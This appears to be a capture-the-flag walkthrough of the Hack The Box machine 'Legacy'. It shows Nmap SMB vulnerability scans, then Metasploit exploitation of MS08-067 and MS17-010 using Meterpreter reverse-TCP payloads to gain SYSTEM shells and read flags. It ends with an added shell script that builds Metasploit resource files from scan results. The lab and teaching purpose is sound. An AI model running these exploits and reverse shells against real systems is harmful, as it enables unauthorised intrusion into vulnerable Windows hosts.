Initial Enumeration
Nmap
I began with an Nmap scan of the target with `nmap -sC -sV -oA nmap/legacy-initial 10.129.227.181 -Pn`, which returned:

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-24 17:37 BST
Nmap scan report for 10.129.227.181
Host is up (0.045s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2024-07-29T21:35:07+03:00
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:1f:7d (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5d00h27m38s, deviation: 2h07m16s, median: 4d22h57m38s
```
SMB
I used `smbclient` to try and view any available shares with `smbclient -L 10.129.227.181`, but this returned an error:

```
Password for [WORKGROUP\kali]:
session setup failed: NT_STATUS_INVALID_PARAMETER
```
Next, I used Nmap to see if any SMB vulnerabilities were present on the target with `nmap --script smb-vuln* -p 139,445 10.129.227.181`. It indicated that the target was vulnerable to `ms08-067` and `ms17-010`:

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-24 17:47 BST
Nmap scan report for 10.129.227.181
Host is up (0.016s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
```
To try and exploit these vulnerabilities, I started Metasploit with `msfconsole -q`. I began by searching for an `ms08-067` module with the `search ms08-067` command and one module was returned:

```
msf6 > search ms08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption
```
I selected this module with `use 0` and used the `show options` command to see what information I needed to provide to the module:

```
msf6 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.2.128    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
```
The `RHOSTS` value (the IP address of the target machine) was empty, so I added this with `set RHOSTS 10.129.227.181`, and the `LHOST` value (the IP address of my Kali machine) wasn't set to my VPN IP address, so I changed this with `set LHOST tun0`. `tun0` is the name of my VPN interface and can be found with `ip a`.
With all the required settings provided, I ran the command `exploit` to run the module. This was a success and I received a Meterpreter session. I checked which user this was running as with the `getuid` command and found I was the `NT AUTHORITY\SYSTEM` user:

```
msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.14.43:4444
[*] 10.129.227.181:445 - Automatically detecting the target...
[*] 10.129.227.181:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.227.181:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.227.181:445 - Attempting to trigger the vulnerability...
[*] Sending stage (176198 bytes) to 10.129.227.181
[*] Meterpreter session 1 opened (10.10.14.43:4444 -> 10.129.227.181:1059) at 2024-07-24 18:06:23 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
I dropped into a shell with the `shell` command and checked the `C:\Documents and Settings` directory to see which users had folders on the system:

```
meterpreter > shell
Process 2040 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>dir "C:\Documents and Settings"
dir "C:\Documents and Settings"
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings

16/03/2017  09:07    <DIR>          .
16/03/2017  09:07    <DIR>          ..
16/03/2017  09:07    <DIR>          Administrator
16/03/2017  08:29    <DIR>          All Users
16/03/2017  08:33    <DIR>          john
               0 File(s)              0 bytes
               5 Dir(s)   6.297.014.272 bytes free
```

I found a `john` user and an `Administrator` user.
The `user.txt` flag was found in the `Desktop` directory within the `john` directory:

```
C:\WINDOWS\system32>dir "C:\Documents and Settings\john\Desktop"
dir "C:\Documents and Settings\john\Desktop"
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\john\Desktop

16/03/2017  09:19    <DIR>          .
16/03/2017  09:19    <DIR>          ..
16/03/2017  09:19                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.297.055.232 bytes free

C:\WINDOWS\system32>type "C:\Documents and Settings\john\Desktop\user.txt"
type "C:\Documents and Settings\john\Desktop\user.txt"
e69**************************44f
```
The `root.txt` flag was found in the `Desktop` directory within the `Administrator` directory and was read with the `type <filepath>` command:

```
C:\WINDOWS\system32>dir "C:\Documents and Settings\Administrator\Desktop"
dir "C:\Documents and Settings\Administrator\Desktop"
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\Administrator\Desktop

16/03/2017  09:18    <DIR>          .
16/03/2017  09:18    <DIR>          ..
16/03/2017  09:18                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.297.042.944 bytes free

C:\WINDOWS\system32>type "C:\Documents and Settings\Administrator\Desktop\root.txt"
type "C:\Documents and Settings\Administrator\Desktop\root.txt"
993**************************713
```
Post Exploitation
I wanted to check whether the target was also vulnerable to the `ms17-010` vulnerability that `nmap` identified. I searched Metasploit modules with the `search ms17-010` command and found five potential modules:

```
msf6 exploit(windows/smb/ms08_067_netapi) > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution
```
I decided to try the `exploit/windows/smb/ms17_010_psexec` module first, so selected this with `use 1`. I checked the information required by the module and found, again, that the `RHOSTS` value was missing and the `LHOST` value was incorrect. I updated these using the same method as above and ran the module with `exploit`.

I received a shell on the target as the `NT AUTHORITY\SYSTEM` user:

```
msf6 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 10.10.14.43:4444
[*] 10.129.227.181:445 - Target OS: Windows 5.1
[*] 10.129.227.181:445 - Filling barrel with fish... done
[*] 10.129.227.181:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.129.227.181:445 - 	[*] Preparing dynamite...
[*] 10.129.227.181:445 - 		[*] Trying stick 1 (x86)...Boom!
[*] 10.129.227.181:445 - 	[+] Successfully Leaked Transaction!
[*] 10.129.227.181:445 - 	[+] Successfully caught Fish-in-a-barrel
[*] 10.129.227.181:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.129.227.181:445 - Reading from CONNECTION struct at: 0x8635f780
[*] 10.129.227.181:445 - Built a write-what-where primitive...
[+] 10.129.227.181:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.129.227.181:445 - Selecting native target
[*] 10.129.227.181:445 - Uploading payload... dKYzsDBx.exe
[*] 10.129.227.181:445 - Created \dKYzsDBx.exe...
[+] 10.129.227.181:445 - Service started successfully...
[*] Sending stage (176198 bytes) to 10.129.227.181
[*] 10.129.227.181:445 - Deleting \dKYzsDBx.exe...
[*] Meterpreter session 2 opened (10.10.14.43:4444 -> 10.129.227.181:1060) at 2024-07-24 18:27:46 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
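As an added example (not part of the original writeup, and not Nmap's or Metasploit's own code), here is a small POSIX shell script that automates the triage step from the Nmap `smb-vuln*` scan through to the Metasploit setup used for both `ms08-067` and `ms17-010` above. It parses the `Host script results` block, keeps only scripts whose `State` is exactly `VULNERABLE` (so `ERROR`, `false` and `NOT VULNERABLE` entries are dropped), and writes a Metasploit resource script that sets `RHOSTS`/`LHOST` for the matching module (`ms08_067_netapi` and `ms17_010_psexec`, the two modules this writeup ran) and calls `check` rather than `exploit`, so the module's own check confirms the finding before anything is fired at the host. The sample input is constructed from the Nmap output above; the `smb-vuln-cve2009-3103` entry is an added negative case, and the script-to-module mapping is this example's assumption.

```sh
#!/bin/sh
# Added example: turn `nmap --script 'smb-vuln*'` results into an msfconsole
# resource script. Not from the original writeup.

# Constructed sample input, modelled on the Host script results above.
# The smb-vuln-cve2009-3103 block is an added NOT VULNERABLE case.
SAMPLE_NMAP_OUTPUT='Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
| smb-vuln-cve2009-3103:
|   NOT VULNERABLE:
|     State: NOT VULNERABLE
|     IDs:  CVE:CVE-2009-3103'

# Read NSE output on stdin; print "<script-name> <CVE>" for every script whose
# State line is exactly VULNERABLE. A script with no State line (ERROR, false)
# or any other state (NOT/LIKELY VULNERABLE) is ignored.
vuln_scripts() {
  awk '
    function flush() {
      if (name != "" && state == "VULNERABLE") print name, (cve == "" ? "-" : cve)
      name = ""; state = ""; cve = ""
    }
    # A new script block starts with "| name:" or "|_name:".
    /^[|]_?[ ]*smb-vuln-[^:]+:/ {
      flush()
      name = $0
      sub(/^[|]_?[ ]*/, "", name)
      sub(/:.*/, "", name)
      next
    }
    /State:/ { state = $0; sub(/.*State:[ ]*/, "", state); sub(/[ ]*$/, "", state) }
    /IDs:/ && match($0, /CVE-[0-9]+-[0-9]+/) { cve = substr($0, RSTART, RLENGTH) }
    END { flush() }
  '
}

# Assumed mapping from NSE script to the Metasploit module used in the writeup.
# Unmapped hits are reported on stderr and skipped.
msf_module_for() {
  case "$1" in
    smb-vuln-ms08-067) echo exploit/windows/smb/ms08_067_netapi ;;
    smb-vuln-ms17-010) echo exploit/windows/smb/ms17_010_psexec ;;
    *) return 1 ;;
  esac
}

# Read NSE output on stdin; write a resource script for `msfconsole -q -r FILE`.
# Both modules above report Check: Yes, so run `check` first; replace it with
# `exploit -j` once the check agrees with the scanner.
build_rc() {
  rhost=$1; lhost=$2
  vuln_scripts | while read -r script cve; do
    if mod=$(msf_module_for "$script"); then
      printf 'use %s\nset RHOSTS %s\nset LHOST %s\ncheck\n' "$mod" "$rhost" "$lhost"
    else
      echo "skipping $script ($cve): no module mapped" >&2
    fi
  done
}

# Live usage (quote the glob so the shell cannot expand it against local files):
#   nmap --script 'smb-vuln*' -p 139,445 10.129.227.181 | build_rc 10.129.227.181 tun0 > legacy.rc
# Demonstration on the constructed sample:
printf '%s\n' "$SAMPLE_NMAP_OUTPUT" | build_rc 10.129.227.181 tun0
```

On the sample this prints two four-line blocks, one per confirmed hit, each ending in `check`; feeding the file to `msfconsole -q -r legacy.rc` reproduces the `use`/`set RHOSTS`/`set LHOST` steps from the walkthrough without retyping them, and the `ms10-054`, `ms10-061` and `cve2009-3103` entries never reach Metasploit.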